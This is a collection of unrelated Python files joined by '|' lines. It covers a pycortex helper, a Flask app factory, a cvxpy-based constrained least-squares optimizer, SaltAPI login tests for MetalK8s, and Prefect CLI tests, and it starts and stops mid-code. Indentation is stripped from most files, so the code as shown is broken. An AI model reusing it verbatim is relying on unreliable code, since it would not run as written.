xfm = np.loadtxt(xfm_tmp)
else:
xfm = np.eye(4)
# os.remove(xfm_tmp)
else:
xfm = utils.get_matrixfromants(xfm)
# if len(norm) == 3:
# norm = np.append(norm,[0])
# elif len(norm) == 4:
# if norm[3] != 0:
# raise ValueError("The last value of array is not zero; this results in translations in the normal vector. Should be set to 0!")
# else:
# raise ValueError(f"Odd number of elements in array.. Vector = {norm}")
rot_norm = norm@xfm[:3,:3]
return rot_norm[:3]
def single_hemi_line_pycortex(normal, hemi, idx, coord=None):
"""create the line_pycortex portion of 1 hemisphere"""
angles = normal2angle(normal)
# Write the rotations describing the orientation of the line in the first session anatomy to a text file
if isinstance(coord, list) or isinstance(coord, np.ndarray):
data = {"hemi": [hemi],
"index": [int(round(idx,0))],
"LR_rot": [angles[0]],
"AP_rot": [angles[1]],
"FH_rot": [angles[2]],
"normal": [normal],
"position": [coord]}
else:
data = {"hemi": [hemi],
"index": [int(round(idx,0))],
"LR_rot": [angles[0]],
"AP_rot": [angles[1]],
"FH_rot": [angles[2]],
"position": [coord]}
df = pd.DataFrame(data)
return df
|
import pytest
import os.path
import logging
from cryptography import x509
from cryptography.hazmat.primitives.asymmetric import rsa
from commandment.pki.models import RSAPrivateKey, CACertificate
logger = logging.getLogger(__name__)
class TestORMUtils:
def test_find_recipient(self, certificate):
pass
|
import logging
from logging.handlers import RotatingFileHandler
import os
from flask import Flask, request, current_app
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_moment import Moment
from config import Config
db = SQLAlchemy()
login = LoginManager()
moment = Moment()
def create_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(config_class)
db.init_app(app)
login.init_app(app)
moment.init_app(app)
from app.main import bp as main_bp
#app.register_blueprint(main_bp, url_prefix='/')
app.register_blueprint(main_bp)
from app.admin import bp as github_bp
app.register_blueprint(github_bp)
    # decide whether to save log information depending on the production environment
if not app.debug:
logs_file_handler = RotatingFileHandler(
os.path.join(app.config['LOG_OUTPUT_PATH'], 'app.log'),
maxBytes=10240, backupCount=10)
logs_file_handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s'
'[in %(pathname)s: %(lineno)s]'))
logs_file_handler.setLevel(logging.INFO)
app.logger.addHandler(logs_file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('Mr.Bean is coming')
return app
from app import models
|
"""
*
* Copyright (c) 2021 Manuel Yves Galliker
* 2021 Autonomous Systems Lab ETH Zurich
* All rights reserved.
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* 3. Neither the name Data Driven Dynamics nor the names of its contributors may be
* used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
"""
__author__ = "Manuel Yves Galliker"
__maintainer__ = "Manuel Yves Galliker"
__license__ = "BSD 3"
from src.optimizers import OptimizerBaseTemplate
import cvxpy
import numpy as np
import pandas as pd
import warnings
from src.tools import math_tools
from sklearn.metrics import r2_score
class QPOptimizer(OptimizerBaseTemplate):
def __init__(self, optimizer_config, param_name_list, verbose=False):
super(QPOptimizer, self).__init__(optimizer_config, param_name_list)
print("Define and solve problem:")
print("min_c (X * c -y)^T * (X * c -y)")
print(" s.t. G * c <= h")
print("Initialized with the following coefficients: ")
print(param_name_list)
self.verbose = verbose
self.n = len(param_name_list)
self.param_name_list = param_name_list
if "parameter_bounds" in self.config:
            self.__compute_ineq_constraints()
else:
warnings.warn("You have selected the QPOptimizer for linear models with \
                bound constraints but have not specified any bounds. \
                Consider switching to LinearRegression for unconstrained parameter estimation.")
self.G = np.zeros(
(1, len(param_name_list)))
self.h = np.zeros(1)
    def __compute_ineq_constraints(self):
param_bounds = self.config["parameter_bounds"]
param_bnd_keys = list(param_bounds.keys())
# assert (len(param_bnd_keys) ==
# self.n), "Optimizer needs exactly one bound per coefficient"
self.G = []
self.h = []
self.fixed_coef_index_list = []
self.fixed_coef_value_list = []
self.optimization_coef_list = []
self.fixed_coef_list = []
for i in range(self.n):
current_param = self.param_name_list[i]
try:
current_bnd_tuple = param_bounds[current_param]
            except KeyError:
print("Can not find bounds for parameter " +
current_param + " in config file.")
if (current_bnd_tuple[0] == current_bnd_tuple[1]):
self.fixed_coef_index_list.append(i)
self.fixed_coef_value_list.append(current_bnd_tuple[0])
self.fixed_coef_list.append(current_param)
else:
self.G.append(-self.index_row(i))
self.G.append(self.index_row(i))
self.h.append(-current_bnd_tuple[0])
self.h.append(current_bnd_tuple[1])
self.optimization_coef_list.append(current_param)
self.G = np.array(self.G)
self.h = np.array(self.h)
self.n_fixed_coef = len(self.fixed_coef_index_list)
self.n_opt_coef = self.n - self.n_fixed_coef
for i in range(self.n_fixed_coef):
reversed_index = self.n_fixed_coef - i - 1
self.G = np.delete(
self.G, self.fixed_coef_index_list[reversed_index], 1)
print("Fixed Coefficients: Value")
for fixed_coef in self.fixed_coef_list:
print(fixed_coef + ": ", param_bounds[fixed_coef][0])
print("-------------------------------------------------------------------------------")
print("Bounded Coefficients: (Min Value, Max Value)")
for opt_coef in self.optimization_coef_list:
print(opt_coef + ": ", param_bounds[opt_coef])
if self.verbose:
print(
"-------------------------------------------------------------------------------")
print(
" Constraints matrices ")
print(
"-------------------------------------------------------------------------------")
print(self.G)
print(self.h)
def index_row(self, i):
index_row = np.zeros(self.n)
index_row[i] = 1
return index_row
def remove_fixed_coef_features(self, X, y):
# remove elements starting from the back
for i in range(self.n_fixed_coef):
reversed_index = self.n_fixed_coef - i - 1
coef_index = self.fixed_coef_index_list[reversed_index]
print(self.fixed_coef_index_list)
print(coef_index)
print(self.n)
print(X.shape)
y = y - (X[:, coef_index] *
self.fixed_coef_value_list[reversed_index]).flatten()
X = np.delete(X, coef_index, 1)
return X, y
def insert_fixed_coefs(self, c_opt):
print(c_opt)
c_opt = list(c_opt)
for i in range(len(self.fixed_coef_index_list)):
c_opt.insert(
self.fixed_coef_index_list[i], self.fixed_coef_value_list[i])
return c_opt
def estimate_parameters(self, X, y):
"""
Define and solve the CVXPY problem.
min_c (X * c -y)^T * (X * c -y)
s.t. G * c <= h
"""
# remove fixed coefficients from problem formulation
self.X = X
self.y = y
self.check_features()
self.X_reduced, self.y_reduced = self.remove_fixed_coef_features(X, y)
self.y = y
c = cvxpy.Variable(self.n_opt_coef)
cost = cvxpy.sum_squares(self.X_reduced @ c - self.y_reduced)
self.prob = cvxpy.Problem(cvxpy.Minimize(cost), [self.G @ c <= self.h])
self.prob.solve(verbose=self.verbose)
self.c_opt = np.array(self.insert_fixed_coefs(
c.value)).reshape((self.n, 1))
self.estimation_completed = True
def set_optimal_coefficients(self, c_opt, X, y):
self.X = X
self.y = y
self.c_opt = np.array(c_opt).reshape((self.n, 1))
self.estimation_completed = True
def get_optimization_parameters(self):
self.check_estimation_completed()
return list(self.c_opt)
def predict(self, X_pred):
self.check_estimation_completed()
y_pred = np.matmul(X_pred, self.c_opt)
return y_pred.flatten()
def compute_optimization_metrics(self):
self.check_estimation_completed()
y_pred = self.predict(self.X)
metrics_dict = {
"RMSE": math_tools.rmse_between_numpy_arrays(y_pred, self.y),
"R2": float(r2_score(self.y, y_pred))
}
if self.verbose:
metrics_dict["Dual Variables"] = (
self.prob.constraints[0].dual_value).tolist()
return metrics_dict
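# Minimal standalone sketch (not part of the class above) of the QP that QPOptimizer solves:
#   min_c (X * c - y)^T * (X * c - y)   s.t.   G * c <= h
# The data, bounds and problem size below are made up purely for illustration.
if __name__ == "__main__":
    X_demo = np.random.rand(50, 2)
    y_demo = X_demo @ np.array([0.5, 1.5])
    # box bounds 0 <= c0 <= 1 and 0 <= c1 <= 2, written as G @ c <= h
    G_demo = np.array([[-1.0, 0.0], [1.0, 0.0], [0.0, -1.0], [0.0, 1.0]])
    h_demo = np.array([0.0, 1.0, 0.0, 2.0])
    c_demo = cvxpy.Variable(2)
    problem = cvxpy.Problem(
        cvxpy.Minimize(cvxpy.sum_squares(X_demo @ c_demo - y_demo)),
        [G_demo @ c_demo <= h_demo])
    problem.solve()
    print("demo coefficients:", c_demo.value)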
|
import ast
import base64
import json
import requests
import pytest
from pytest_bdd import parsers, scenario, then, when
# Scenario {{{
@scenario('../features/salt_api.feature', 'Login to SaltAPI using Basic auth')
def test_login_basic_auth_to_salt_api(host):
pass
@scenario('../features/salt_api.feature',
'Login to SaltAPI using an admin ServiceAccount')
@scenario('../features/salt_api.feature',
'Login to SaltAPI using a ServiceAccount')
def test_login_bearer_auth_to_salt_api(host):
pass
@pytest.fixture(scope='function')
def context():
return {}
# }}}
# When {{{
@when(parsers.parse(
"we login to SaltAPI as '{username}' using password '{password}'"))
def login_salt_api_basic(host, username, password, version, context):
address = _get_salt_api_address(host, version)
token = base64.encodebytes(
'{}:{}'.format(username, password).encode('utf-8')
).rstrip()
context['salt-api'] = _salt_api_login(address, username, token, 'Basic')
@when("we login to SaltAPI with an admin ServiceAccount")
def login_salt_api_admin_sa(host, k8s_client, admin_sa, version, context):
sa_name, sa_namespace = admin_sa
address = _get_salt_api_address(host, version)
context['salt-api'] = _login_salt_api_sa(
address, k8s_client,
sa_name, sa_namespace
)
@when(parsers.parse(
"we login to SaltAPI with the ServiceAccount '{account_name}'"))
def login_salt_api_system_sa(host, k8s_client, account_name, version, context):
address = _get_salt_api_address(host, version)
context['salt-api'] = _login_salt_api_sa(
address, k8s_client,
account_name, 'kube-system'
)
# }}}
# Then {{{
@then('we can ping all minions')
def ping_all_minions(host, context):
result = requests.post(
context['salt-api']['url'],
json=[
{
'client': 'local',
'tgt': '*',
'fun': 'test.ping',
},
],
headers={
'X-Auth-Token': context['salt-api']['token'],
},
verify=False,
)
result_data = result.json()
assert result_data['return'][0] != []
@then('authentication fails')
def authentication_fails(host, context):
assert context['salt-api']['login-status-code'] == 401
@then(parsers.parse("we can invoke '{modules}' on '{targets}'"))
def invoke_module_on_target(host, context, modules, targets):
assert {targets: ast.literal_eval(modules)} in context['salt-api']['perms']
@then(parsers.parse("we have '{perms}' perms"))
def have_perms(host, context, perms):
assert perms in context['salt-api']['perms']
# }}}
# Helpers {{{
def _login_salt_api_sa(address, k8s_client, sa_name, sa_namespace):
service_account = k8s_client.read_namespaced_service_account(
name=sa_name, namespace=sa_namespace
)
secret = k8s_client.read_namespaced_secret(
name=service_account.secrets[0].name, namespace=sa_namespace
)
token = base64.decodebytes(secret.data['token'].encode('utf-8'))
return _salt_api_login(
address, sa_name, token, 'Bearer'
)
def _get_salt_api_address(host, version):
SALT_API_PORT = 4507
cmd_cidr = ' '.join([
'salt-call', 'pillar.get',
'networks:control_plane',
'saltenv=metalk8s-{version}'.format(version=version),
'--out', 'json',
])
with host.sudo():
cidr_output = host.check_output(cmd_cidr)
cidr = json.loads(cidr_output)['local']
cmd_ip = ' '.join([
'salt-call', '--local',
'network.ip_addrs',
'cidr="{cidr}"'.format(cidr=cidr),
'--out', 'json',
])
with host.sudo():
cmd_output = host.check_output(cmd_ip)
ip = json.loads(cmd_output)['local'][0]
return '{}:{}'.format(ip, SALT_API_PORT)
def _salt_api_login(address, username, token, token_type):
response = requests.post(
'https://{}/login'.format(address),
data={
'eauth': 'kubernetes_rbac',
'username': username,
'token': token,
'token_type': token_type,
},
verify=False,
)
result = {
'url': 'https://{}'.format(address),
'token': None,
'perms': [],
'login-status-code': response.status_code,
}
if response.status_code == 200:
json_data = response.json()
result['token'] = json_data['return'][0]['token']
result['perms'] = json_data['return'][0]['perms']
return result
# }}}
|
from abc import ABC, abstractmethod
from machine.plugin import PluginType
class Resource(ABC):
@abstractmethod
def __call__(self) -> PluginType:
raise NotImplementedError
|
"""
Top level CLI commands.
"""
from .dcos_docker import dcos_docker
from .dcos_vagrant import dcos_vagrant
__all__ = [
'dcos_docker',
'dcos_vagrant',
]
|
from mygtestabcde.Ml import Ml
|
import textwrap
import sys
import os
import json
import pytest
import pendulum
from click.testing import CliRunner
from unittest.mock import MagicMock
from prefect import Flow
from prefect.engine.state import Scheduled
from prefect.run_configs import UniversalRun
from prefect.storage import Local as LocalStorage
from prefect.backend import FlowRunView, FlowView
from prefect.cli.run import load_json_key_values, run
SUCCESSFUL_LOCAL_STDOUT = """
Retrieving local flow... Done
Running flow locally...
Flow run succeeded!
""".lstrip()
FAILURE_LOCAL_STDOUT = """
Retrieving local flow... Done
Running flow locally...
Flow run failed!
""".lstrip()
TEST_FLOW_VIEW = FlowView(
flow_id="flow-id",
name="flow-name",
settings={"key": "value"},
run_config=UniversalRun(env={"ENV": "VAL"}),
flow=Flow("flow"),
serialized_flow=Flow("flow").serialize(),
archived=False,
project_name="project",
flow_group_labels=["label"],
core_version="0.0.0",
storage=LocalStorage(stored_as_script=True, path="fake-path.py"),
)
TEST_FLOW_RUN_VIEW = FlowRunView(
flow_run_id="flow-run-id",
name="flow-run-name",
flow_id="flow-id",
state=Scheduled(message="state-1"),
states=[],
parameters={"param": "value"},
context={"foo": "bar"},
labels=["label"],
updated_at=pendulum.now(),
run_config=UniversalRun(),
)
@pytest.fixture()
def hello_world_flow_file(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
"""
from prefect.hello_world import hello_flow
""".strip(),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def multiflow_file(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow
flow_a = Flow("a")
flow_b = Flow("b")
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def context_flow_file(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow, task
@task(log_stdout=True)
def print_context_x():
from prefect import context
print(context.get("x"))
with Flow("context-test-flow") as flow:
print_context_x()
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def runtime_failing_flow(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow, task
@task(log_stdout=True)
def fail_task():
raise ValueError("Some error")
with Flow("fail-test-flow") as flow:
fail_task()
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def at_load_failing_flow(tmpdir):
flow_file = tmpdir.join("flow.py")
flow_file.write_text(
textwrap.dedent(
"""
from prefect import Flow
with Flow("fail-test-flow") as flow:
reference_an_unknown_var
"""
),
encoding="UTF-8",
)
return str(flow_file)
@pytest.fixture()
def cloud_mocks(monkeypatch):
class CloudMocks:
FlowView = MagicMock()
FlowRunView = MagicMock()
Client = MagicMock()
watch_flow_run = MagicMock()
mocks = CloudMocks()
monkeypatch.setattr("prefect.cli.run.FlowView", mocks.FlowView)
monkeypatch.setattr("prefect.cli.run.FlowRunView", mocks.FlowRunView)
monkeypatch.setattr("prefect.cli.run.Client", mocks.Client)
monkeypatch.setattr("prefect.cli.run.watch_flow_run", mocks.watch_flow_run)
return mocks
@pytest.mark.parametrize(
"input,output",
[
("2", 2),
("2.0", 2.0),
('"2.0"', "2.0"),
("foo", "foo"),
('"foo"', "foo"), # auto-quoted
('{"key": "value"}', {"key": "value"}),
],
)
def test_load_json_key_values(input, output):
assert load_json_key_values([f"test={input}"], "")["test"] == output
def test_run_help():
result = CliRunner().invoke(run, ["--help"])
assert not result.exit_code
assert "Run a flow" in result.output
assert "Examples:" in result.output
@pytest.mark.parametrize(
"options",
(
["--name", "hello", "--id", "fake-id"],
["--project", "hello", "--path", "fake-id"],
["--project", "hello", "--id", "fake-id"],
["--module", "hello", "--id", "fake-id"],
),
)
def test_run_lookup_help_too_many_options(options):
result = CliRunner().invoke(run, options)
assert result.exit_code
assert "Received too many options to look up the flow" in result.output
assert (
"Look up a flow to run with one of the following option combinations"
in result.output
)
def test_run_lookup_help_no_options():
result = CliRunner().invoke(run, "--param foo=1")
assert result.exit_code
assert "Received no options to look up the flow" in result.output
assert (
"Look up a flow to run with one of the following option combinations"
in result.output
)
def test_run_wraps_parameter_file_parsing_exception(tmpdir):
params_file = tmpdir.join("params.json")
params_file.write_text("not-valid-json", encoding="UTF-8")
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param-file", str(params_file)]
)
assert result.exit_code
assert "Failed to parse JSON" in result.output
def test_run_wraps_parameter_file_not_found_exception(tmpdir):
params_file = tmpdir.join("params.json")
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param-file", str(params_file)]
)
assert result.exit_code
assert "Parameter file does not exist" in result.output
@pytest.mark.parametrize("kind", ["param", "context"])
def test_run_wraps_parameter_and_context_json_parsing_exception(tmpdir, kind):
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", f"--{kind}", 'x="foo"1']
)
assert result.exit_code
assert (
f"Failed to parse JSON for {kind.replace('param', 'parameter')} 'x'"
in result.output
)
def test_run_automatically_quotes_simple_strings():
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param", "name=foo"]
)
assert not result.exit_code
assert "Parameters: {'name': 'foo'}" in result.output
@pytest.mark.parametrize("kind", ["path", "module"])
def test_run_local(tmpdir, kind, caplog, hello_world_flow_file):
location = hello_world_flow_file if kind == "path" else "prefect.hello_world"
result = CliRunner().invoke(run, [f"--{kind}", location])
assert not result.exit_code
assert result.output == SUCCESSFUL_LOCAL_STDOUT
# FlowRunner logs are displayed
assert "Hello World" in caplog.text
@pytest.mark.parametrize("kind", ["path", "module"])
def test_run_local_allows_selection_from_multiple_flows(
monkeypatch, multiflow_file, kind
):
monkeypatch.syspath_prepend(os.path.dirname(os.path.abspath(multiflow_file)))
location = multiflow_file if kind == "path" else "flow"
result = CliRunner().invoke(run, [f"--{kind}", location, "--name", "b"])
assert not result.exit_code
assert result.output == SUCCESSFUL_LOCAL_STDOUT
@pytest.mark.parametrize("kind", ["path", "module"])
def test_run_local_asks_for_name_with_multiple_flows(tmpdir, multiflow_file, kind):
if kind == "module":
# Extend the sys.path so we can pull from the file like a module
orig_sys_path = sys.path.copy()
sys.path.insert(0, os.path.dirname(os.path.abspath(multiflow_file)))
location = multiflow_file if kind == "path" else "flow"
result = CliRunner().invoke(run, [f"--{kind}", location])
assert result.exit_code
assert (
f"Found multiple flows at {location!r}: 'a', 'b'\n\nSpecify a flow name to run"
in result.output
)
if kind == "module":
sys.path = orig_sys_path
@pytest.mark.parametrize("log_level", ["ERROR", "DEBUG"])
def test_run_local_log_level(tmpdir, caplog, log_level):
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--log-level", log_level]
)
assert not result.exit_code
assert result.output == SUCCESSFUL_LOCAL_STDOUT
# Hello World is _not_ an error level log and should not be displayed then
if log_level == "ERROR":
assert "Hello World" not in caplog.text
assert "INFO" not in caplog.text
else:
assert "Hello World" in caplog.text
assert "INFO" in caplog.text
assert "DEBUG" in caplog.text
def test_run_local_respects_quiet(caplog):
result = CliRunner().invoke(run, ["--module", "prefect.hello_world", "--quiet"])
assert not result.exit_code
assert result.output == ""
# Flow run logs are still happening for local runs
assert "Hello World" in caplog.text
def test_run_local_respects_no_logs(caplog):
result = CliRunner().invoke(run, ["--module", "prefect.hello_world", "--no-logs"])
assert not result.exit_code
# Run output still occurs
assert result.output == SUCCESSFUL_LOCAL_STDOUT
# Flow run logs are silenced
assert caplog.text == ""
def test_run_local_passes_parameters(caplog):
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param", 'name="foo"']
)
assert not result.exit_code
    # A configured section will appear now that a parameter is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert "Configured local flow run\n└── Parameters: {'name': 'foo'}" in result.output
# Parameter was used by the flow
assert "Hello Foo" in caplog.text
def test_run_local_passes_parameters_from_file(caplog, tmpdir):
params_file = tmpdir.join("params.json")
params_file.write_text(json.dumps({"name": "foo"}), encoding="UTF-8")
result = CliRunner().invoke(
run, ["--module", "prefect.hello_world", "--param-file", str(params_file)]
)
assert not result.exit_code
    # A configured section will appear now that a parameter is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert "Configured local flow run\n└── Parameters: {'name': 'foo'}" in result.output
# Parameter was used by the flow
assert "Hello Foo" in caplog.text
def test_run_local_passes_context(caplog, context_flow_file):
result = CliRunner().invoke(
run, ["--path", context_flow_file, "--context", 'x="custom-context-val"']
)
assert not result.exit_code
    # A configured section will appear now that the context is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert (
"Configured local flow run\n└── Context: {'x': 'custom-context-val'}"
in result.output
)
# Parameter was used by the flow
assert "custom-context-val" in caplog.text
def test_run_passes_context(caplog, context_flow_file):
result = CliRunner().invoke(
run, ["--path", context_flow_file, "--context", 'x="custom-context-val"']
)
assert not result.exit_code
    # A configured section will appear now that the context is set
for line in SUCCESSFUL_LOCAL_STDOUT:
assert line in result.output
assert (
"Configured local flow run\n└── Context: {'x': 'custom-context-val'}"
in result.output
)
# Parameter was used by the flow
assert "custom-context-val" in caplog.text
def test_run_local_handles_flow_run_failure(caplog, runtime_failing_flow):
result = CliRunner().invoke(run, ["--path", runtime_failing_flow])
assert not result.exit_code
assert result.output == FAILURE_LOCAL_STDOUT
# Flow runner logged exception
assert "ValueError: Some error" in caplog.text
def test_run_local_handles_flow_load_failure_with_script_issue(at_load_failing_flow):
result = CliRunner().invoke(run, ["--path", at_load_failing_flow])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
assert "Traceback" in result.output
@pytest.mark.skipif(
sys.platform == "win32", reason="Full traceback displayed on Windows"
)
def test_run_local_handles_flow_load_failure_with_missing_file(tmpdir):
missing_file = str(tmpdir.join("file"))
result = CliRunner().invoke(run, ["--path", missing_file])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
# Instead of a traceback there is a short error
assert "Traceback" not in result.output
assert f"File does not exist: {missing_file!r}" in result.output
def test_run_local_handles_flow_load_failure_with_missing_module(tmpdir):
missing_file = str(tmpdir.join("file"))
result = CliRunner().invoke(run, ["--module", "my_very_unique_module_name"])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
# Instead of a traceback there is a short error
assert "Traceback" not in result.output
assert "No module named 'my_very_unique_module_name'" in result.output
def test_run_local_handles_flow_load_failure_with_missing_module_attr(tmpdir):
missing_file = str(tmpdir.join("file"))
result = CliRunner().invoke(run, ["--module", "prefect.foobar"])
assert result.exit_code
assert "Retrieving local flow... Error" in result.output
# Instead of a traceback there is a short error
assert "Traceback" not in result.output
assert "Module 'prefect' has no attribute 'foobar'" in result.output
@pytest.mark.parametrize(
"cli_args,cloud_kwargs",
[
(
["--param", "a=2", "--param", "b=[1,2,3]"],
dict(parameters={"a": 2, "b": [1, 2, 3]}),
),
(
["--context", "a=1", "--context", 'b={"nested": 2}'],
dict(context={"a": 1, "b": {"nested": 2}}),
),
(["--label", "foo", "--label", "bar"], dict(labels=["foo", "bar"])),
(["--run-name", "my-run"], dict(run_name="my-run")),
(
["--log-level", "DEBUG"],
dict(
run_config=UniversalRun(
# Notice this tests for ENV merging
env={"ENV": "VAL", "PREFECT__LOGGING__LEVEL": "DEBUG"}
)
),
),
(
# No logs does not alter the log level for cloud runs, we just don't query
# for them in `watch_flow_run`
["--no-logs"],
dict(),
),
],
)
def test_run_cloud_creates_flow_run(cloud_mocks, cli_args, cloud_kwargs):
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
result = CliRunner().invoke(run, ["--id", "flow-id"] + cli_args)
assert not result.exit_code
cloud_kwargs.setdefault("parameters", {})
cloud_kwargs.setdefault("context", {})
cloud_kwargs.setdefault("labels", None)
cloud_kwargs.setdefault("run_name", None)
cloud_kwargs.setdefault("run_config", None)
cloud_mocks.Client().create_flow_run.assert_called_once_with(
flow_id=TEST_FLOW_VIEW.flow_id,
**cloud_kwargs,
)
def test_run_cloud_handles_create_flow_run_failure(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
cloud_mocks.Client().create_flow_run.side_effect = ValueError("Foo!")
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert result.exit_code
assert "Creating run for flow 'flow-name'... Error" in result.output
assert "Traceback" in result.output
assert "ValueError: Foo!" in result.output
def test_run_cloud_handles_keyboard_interrupt_during_create_flow_run(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
cloud_mocks.Client().create_flow_run.side_effect = KeyboardInterrupt
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Creating run for flow 'flow-name'..." in result.output
assert "Keyboard interrupt detected! Aborting..." in result.output
assert "Aborted." in result.output
def test_run_cloud_handles_keyboard_interrupt_during_flow_run_info(cloud_mocks):
# This test differs from `...interrupt_during_create_flow_run` in that the flow
# run is created and the user has cancelled during metadata retrieval so we need
# to actually cancel the run
cloud_mocks.FlowView.from_flow_id.return_value = TEST_FLOW_VIEW
cloud_mocks.Client().create_flow_run.return_value = "fake-run-id"
cloud_mocks.FlowRunView.from_flow_run_id.side_effect = KeyboardInterrupt
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Creating run for flow 'flow-name'..." in result.output
assert "Keyboard interrupt detected! Aborting..." in result.output
assert "Cancelled flow run." in result.output
cloud_mocks.Client().cancel_flow_run.assert_called_once_with(
flow_run_id="fake-run-id"
)
def test_run_cloud_respects_quiet(cloud_mocks):
cloud_mocks.Client().create_flow_run.return_value = "fake-run-id"
result = CliRunner().invoke(run, ["--id", "flow-id", "--quiet"])
assert not result.exit_code
assert result.output == "fake-run-id\n"
@pytest.mark.parametrize("watch", [True, False])
def test_run_cloud_watch(cloud_mocks, watch):
cloud_mocks.Client().create_flow_run.return_value = "fake-run-id"
result = CliRunner().invoke(
run, ["--id", "flow-id"] + (["--watch"] if watch else [])
)
assert not result.exit_code
if watch:
cloud_mocks.watch_flow_run.assert_called_once()
assert cloud_mocks.watch_flow_run.call_args[1]["flow_run_id"] == "fake-run-id"
else:
cloud_mocks.watch_flow_run.assert_not_called()
def test_run_cloud_watch_respects_no_logs(cloud_mocks):
result = CliRunner().invoke(run, ["--id", "flow-id", "--watch", "--no-logs"])
assert not result.exit_code
cloud_mocks.watch_flow_run.assert_called_once()
assert cloud_mocks.watch_flow_run.call_args[1]["stream_logs"] is False
def test_run_cloud_lookup_by_flow_id(cloud_mocks):
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Looking up flow metadata... Done" in result.output
cloud_mocks.FlowView.from_flow_id.assert_called_once_with("flow-id")
def test_run_cloud_lookup_by_flow_group_id(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.side_effect = ValueError() # flow id is not found
cloud_mocks.FlowView.from_flow_group_id.return_value = TEST_FLOW_VIEW
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert not result.exit_code
assert "Looking up flow metadata... Done" in result.output
cloud_mocks.FlowView.from_flow_id.assert_called_once_with("flow-id")
@pytest.mark.parametrize("with_project", [True, False])
def test_run_cloud_lookup_by_name(cloud_mocks, with_project):
result = CliRunner().invoke(
run,
["--name", "flow-name"]
+ (["--project", "project-name"] if with_project else []),
)
assert not result.exit_code
assert "Looking up flow metadata... Done" in result.output
expected = {"flow_name": "flow-name"}
if with_project:
expected["project_name"] = "project-name"
cloud_mocks.FlowView.from_flow_name.assert_called_once_with(**expected)
def test_run_cloud_handles_ids_not_found(cloud_mocks):
cloud_mocks.FlowView.from_flow_id.side_effect = ValueError() # flow id is not found
cloud_mocks.FlowView.from_flow_group_id.side_effect = ValueError()
result = CliRunner().invoke(run, ["--id", "flow-id"])
assert result.exit_code
assert "Looking up flow metadata... Error" in result.output
assert "Failed to find flow id or flow group id" in result.output
assert "Traceback" not in result.output
def test_run_cloud_displays_name_lookup_errors(cloud_mocks):
cloud_mocks.FlowView.from_flow_name.side_effect = ValueError("Example error")
result = CliRunner().invoke(run, ["--name", "foo"])
assert result.exit_code
assert "Looking up flow metadata... Error" in result.output
# TODO: Note this error message could be wrapped for a better UX
assert "Example error" in result.output
def test_run_cloud_handles_project_without_name(cloud_mocks):
cloud_mocks.FlowView.from_flow_name.side_effect = ValueError("No results found")
result = CliRunner().invoke(run, ["--project", "foo"])
assert result.exit_code
assert "Looking up flow metadata... Error" in result.output
assert (
"Missing required option `--name`. Cannot look up a flow by project without "
"also passing a name." in result.output
)
def test_run_cloud_displays_flow_run_data(cloud_mocks):
cloud_mocks.FlowRunView.from_flow_run_id.return_value = TEST_FLOW_RUN_VIEW
cloud_mocks.Client.return_value.get_cloud_url.return_value = "fake-url"
result = CliRunner().invoke(run, ["--id", "flow-id"])
